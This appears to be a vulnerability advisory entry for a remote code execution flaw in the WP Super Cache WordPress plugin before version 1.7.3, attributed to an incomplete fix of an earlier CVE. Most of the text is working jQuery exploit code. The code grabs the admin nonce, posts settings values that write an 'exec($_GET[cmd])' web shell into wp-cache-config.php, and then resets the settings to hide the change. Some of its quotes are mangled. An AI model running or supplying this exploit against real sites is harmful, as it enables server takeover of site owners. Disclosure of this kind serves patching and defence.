The parameters $cache_path, $wp_cache_debug_ip, $wp_super_cache_front_page_text, $cache_scheduled_time, $cached_direct_pages used in the plugin settings result in RCE because they allow input of “$” and “\n”. This is due to an incomplete fix of CVE-2021-24209. You can run the command directly to “https://target/wp-content/wp-cache-config.php”.
//Exploit $cache_path url = ‘http://wp.lab/wordpress/wp-admin/options-general.php?page=wpsupercache&tab;=settings’; jQuery.get(url,function(e){ jQuery.post(url,{ “action”: “scupdates”, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_enabled”: 1, “wp_cache_location”: “/tmp/\n$cache_path\necho exec($_GET[cmd]);#” }) console.log(‘SET!’); }).then(()=>{ jQuery.get(url,function(e){ jQuery.post(url,{ “action”: “scupdates”, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_enabled”: 1, “wp_cache_location”: “./” }) }); console.log(‘EXPLOIT!’); }); //Exploit $wp_cache_debug_ip, $wp_super_cache_front_page_text url = ‘http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab;=debug’; jQuery.get(url,function(e){ jQuery.post(url,{ “wp_cache_debug”: 1, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_debug_ip”: “/tmp/\n$wp_cache_debug_ip\necho exec($_GET[cmd]);#” //“wp_super_cache_front_page_text”: “/tmp/\n$wp_super_cache_front_page_text\necho exec($_GET[cmd]);#” }) console.log(‘SET!’); }).then(()=>{ jQuery.get(url,function(e){ jQuery.post(url,{ “wp_cache_debug”: 1, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_debug_ip”: “1” //“wp_super_cache_front_page_text”: “1” }) }); console.log(‘EXPLOIT!’); }); //Exploit $cache_scheduled_time + $cached_direct_pages url = ‘http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab;=settings’; jQuery.get(url,function(e){ jQuery.post(url,{ “action”: “scupdates”, “wp_cache_enabled”: “1”, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1] }) console.log(‘SET1!’); }).then(()=>{ jQuery.get(url,function(e){ jQuery.post(url,{ “action”:“expirytime”, “cache_scheduled_time”: “\n:00", "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1], "new_direct_page":"
;echo$_GET[cmd]
;#” }) }).then(()=>{ console.log(‘EXPLOIT!’); jQuery.get(url,function(e){ jQuery.post(url,{ “action”:“expirytime”, “cache_scheduled_time”: “00:00”, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “new_direct_page”:“;echo
$_GET[cmd]`;#” }) }) }); console.log(‘SET2!’); });
CPE | Name | Operator | Version |
---|---|---|---|
wp-super-cache | lt | 1.7.3 |